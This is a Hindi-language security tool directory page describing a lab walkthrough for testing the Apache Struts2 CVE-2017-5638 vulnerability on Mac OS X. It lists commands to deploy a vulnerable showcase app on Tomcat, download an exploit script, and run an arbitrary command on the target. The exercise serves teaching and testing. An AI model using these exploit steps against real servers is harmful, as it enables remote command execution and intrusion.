Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
test_struts2_vulnerability_CVE-2017-5638 — Mac OS X में struts2 भेद्यता CVE-2017-5638 का परीक्षण करें | Kitploit
उपकरण/GitHubGitHub/sjitech/test_struts2_vulnerability_cve-2017-5638
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubsjitech/test_struts2_vulnerability_cve-2017-5638

test_struts2_vulnerability_CVE-2017-5638

Mac OS X में struts2 भेद्यता CVE-2017-5638 का परीक्षण करें

रिपॉजिटरी देखें
19 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

test_struts2_vulnerability_CVE-2017-5638_in_MAC_OS_X

Mac OS X में CVE-2017-5638 struts2 कमजोरी का परीक्षण करें

###टॉमकैट पर परीक्षण वेब एप्लिकेशन डाउनलोड करें और चलाएँ

root@kitploit:~
#install tomcat
brew install tomcat

#confirm where the tomcat installed
ls -lF `which catalina`

#confirm tomcat home dir
ls -lF /usr/local/Cellar/tomcat/8.5.11/libexec

#create web app "struts2" in webapps of tomcat home
mkdir /usr/local/Cellar/tomcat/8.5.11/libexec/webapps/struts2

#get web app deployment file
wget https://github.com/nixawk/labs/raw/master/CVE-2017-5638/struts2_2.3.15.1-showcase.war

#expand deployment file into the web app dir
brew install p7zip
7z x struts2_2.3.15.1-showcase.war -o/usr/local/Cellar/tomcat/8.5.11/libexec/webapps/struts2

#confirm web app files
ls -lF /usr/local/Cellar/tomcat/8.5.11/libexec/webapps/struts2

#run tomcat
catalina run

http://localhost:8080/struts2 पर जाकर वेब एप्लिकेशन की पुष्टि करें

###दूसरी मशीन से, किसी भी कमांड को चलाने की क्षमता प्राप्त करने के लिए शोषण स्क्रिप्ट चलाएँ

root@kitploit:~
#get exploit tool script
wget https://github.com/nixawk/labs/raw/master/CVE-2017-5638/exploit-urllib2.py

#run exploit tool script
python exploit-urllib2.py http://192.168.11.5:8080/struts2/ "echo any command can be run > /tmp/yyy"

###वेब मशीन पर वापस जाएँ, जाँच करें कि /tmp/yyy फ़ाइल इंजेक्ट की गई है या नहीं

root@kitploit:~
cat /tmp/yyy

वीडियो: https://youtu.be/iQ_f-eG-EXg

टूल डाउनलोड करें